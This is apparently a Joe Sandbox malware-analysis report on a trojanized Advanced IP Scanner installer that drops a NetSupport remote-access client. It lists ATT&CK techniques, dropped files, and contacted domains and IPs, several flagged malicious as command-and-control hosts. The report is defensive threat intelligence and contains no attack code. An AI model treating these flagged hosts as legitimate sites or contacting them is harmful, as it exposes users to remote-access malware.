DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	31 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	3 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Advanced_IP_Scanner_2.5.4594.12.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)	3%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-console-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-datetime-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-debug-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-errorhandling-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-file-l2-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-handle-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-heap-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-interlocked-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-libraryloader-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-localization-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-memory-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-namedpipe-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processenvironment-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-processthreads-l1-1-1.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-profile-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-rtlsupport-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-string-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-synch-l1-2-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-sysinfo-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-timezone-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-core-util-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-conio-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-convert-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-environment-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-filesystem-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-heap-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-locale-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-math-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-multibyte-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-private-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-process-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-runtime-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-stdio-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-string-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-time-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\api-ms-win-crt-utility-l1-1-0.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-15NDN.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-2I7SK.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-3K2R2.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-3SOVH.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-46V0R.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-4RR0D.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-56ICT.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-5BCDU.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7B70A.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7MB5M.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-7V6MF.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-853KO.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-8VUCH.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-91UK3.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-92959.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-BSRNO.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-CEPGI.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-CQ3UL.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-D0PHJ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-D20H8.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DFCT3.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DFILP.tmp	3%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DFL4O.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-DUVAI.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-FRMIK.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-G3D36.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-GHBG6.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-GUAOM.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-H6NSK.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IE1PQ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IENMB.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IGVP5.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-IUPCJ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JFL1I.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JPUOQ.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-JTIOC.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-KATLC.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-KNEGU.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-MMC0L.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-N93NO.tmp	0%	ReversingLabs
C:\Program Files (x86)\Advanced IP Scanner\is-NE6KC.tmp	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://www.remobjects.com/ps	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://www.innosetup.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://www.symauth.com/cps0(	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crl.m	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://www.symauth.com/rpa00	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
payiki.com	151.236.16.15	true	true	unknown
geo.netsupportsoftware.com	104.26.1.231	true	false	unknown
anyhowdo.com	199.188.200.195	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://151.236.16.15/fakeurl.htm	true	unknown
http://geo.netsupportsoftware.com/location/loca.asp	false	unknown
http://199.188.200.195/fakeurl.htm	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.netsupportsoftware.com	powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	Advanced_IP_Scanner_2.5.4594.12.exe	false		unknown
http://%s/testpage.htmwininet.dll	powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)	client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://ocsp.sectigo.com0	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	false	URL Reputation: safe	unknown
http://www.pci.co.uk/supportsupport	client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
http://crl.microsoft	powershell.exe, 00000005.00000002.2038454722.0000000007718000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989875022.0000000003124000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://127.0.0.1RESUMEPRINTING	client32.exe, 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://%s/testpage.htm	powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.5.dr	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com/update	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2099926952.0000000002D33000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2091844461.000000000267A000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crl.microsoV	powershell.exe, 00000005.00000002.2042967524.000000000878D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://%s/fakeurl.htm	client32.exe, client32.exe, 00000007.00000002.4193677997.00000000685D0000.00000002.00000001.01000000.0000000F.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.aspM	client32.exe, 00000007.00000002.4192062509.0000000002F60000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.asp=Rw	client32.exe, 00000007.00000002.4192062509.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://geo.netsupportsoftware.com/location/loca.asptXI	client32.exe, 00000007.00000002.4190771017.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.1992936334.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2099926952.0000000002D24000.00000004.00001000.00020000.00000000.sdmp	false		unknown
https://www.remobjects.com/ps	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1723461870.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1722972586.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1725364189.00000000003F1000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.innosetup.com/	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1723461870.000000007EF1B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1722972586.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1725364189.00000000003F1000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.dr	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0D	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	false		unknown
http://www.famatech.comARPHELPLINKThe	is-COPMO.tmp.1.dr	false		unknown
http://www.macrovision.com0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://geo.netsupportsoftware.com/location/loca.aspp	client32.exe, 00000007.00000002.4190771017.00000000004B2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.netsupportschool.com/tutor-assistant.asp11(	client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.1992936334.0000000004C31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.netsupportschool.com/tutor-assistant.asp	client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pci.co.uk/support	client32.exe, 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2083867183.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164943299.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp	false		unknown
https://sectigo.com/CPS0	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	false	URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005588000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.thawte.com0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000005.00000002.2006771034.000000000669B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.radmin.com	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.5.dr	false	URL Reputation: safe	unknown
http://127.0.0.1	client32.exe, client32.exe, 00000008.00000002.2083823196.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2164887395.000000001118F000.00000002.00000001.01000000.0000000B.sdmp	false		unknown
http://www.symauth.com/cps0(	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	false	URL Reputation: safe	unknown
http://www.advanced-ip-scanner.com0	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2095942148.000000000018C000.00000004.00000010.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, is-7MB5M.tmp.1.dr, is-JTIOC.tmp.1.dr	false		unknown
http://crl.m	powershell.exe, 00000005.00000002.2038454722.00000000076C2000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com1	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2091844461.000000000266C000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr	false	URL Reputation: safe	unknown
http://www.symauth.com/rpa00	Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2076249415.0000000005014000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.5.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	powershell.exe, 00000005.00000002.1992936334.000000000516A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.00000000050CE000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.dr, remcmdstub.exe.5.dr	false	URL Reputation: safe	unknown
http://www.ultimatenetworktool.com/support	Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2099926952.0000000002D33000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2091844461.000000000267A000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000005.00000002.1992936334.0000000004D83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1992936334.0000000005588000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.26.1.231	geo.netsupportsoftware.com	United States	13335	CLOUDFLARENETUS	false
151.236.16.15	payiki.com	European Union	29802	HVC-ASUS	true
199.188.200.195	anyhowdo.com	United States	22612	NAMECHEAP-NETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546304
Start date and time:	2024-10-31 18:47:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Advanced_IP_Scanner_2.5.4594.12.exe
Detection:	MAL
Classification:	mal56.rans.spre.troj.evad.winEXE@10/300@3/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 70% Number of executed functions: 175 Number of non-executed functions: 203
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
